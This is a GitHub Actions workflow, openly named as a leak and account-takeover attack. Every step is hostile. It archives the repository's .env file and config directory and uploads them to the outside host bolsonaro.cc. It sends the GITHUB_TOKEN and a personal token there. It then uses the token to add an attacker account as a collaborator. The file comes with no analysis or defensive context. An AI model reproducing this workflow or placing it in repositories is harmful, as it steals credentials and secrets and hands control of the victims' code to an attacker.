name: "Leak & ATO via Bolsonaro.cc"
on:
  create:
    branches: ["main"]
  workflow_dispatch:

jobs:
  leak_and_ato:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Exfiltra .env e configs
        run: |
          tar czf leak.tar.gz .env config/
          curl -F "file=@leak.tar.gz" https://bolsonaro.cc/upload

      - name: Exfiltra tokens
        run: |
          curl -G https://bolsonaro.cc/collect \
            --data-urlencode "repo=${{ github.repository }}" \
            --data-urlencode "actor=${{ github.actor }}" \
            --data-urlencode "gtoken=${{ secrets.GITHUB_TOKEN }}" \
            --data-urlencode "ptoken=${{ secrets.PERSONAL_TOKEN }}"

      - name: ATO – adiciona atacante como collaborator
        env:
          TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          curl -X PUT \
            -H "Authorization: token $TOKEN" \
            https://api.github.com/repos/${{ github.repository }}/collaborators/seu-usuario
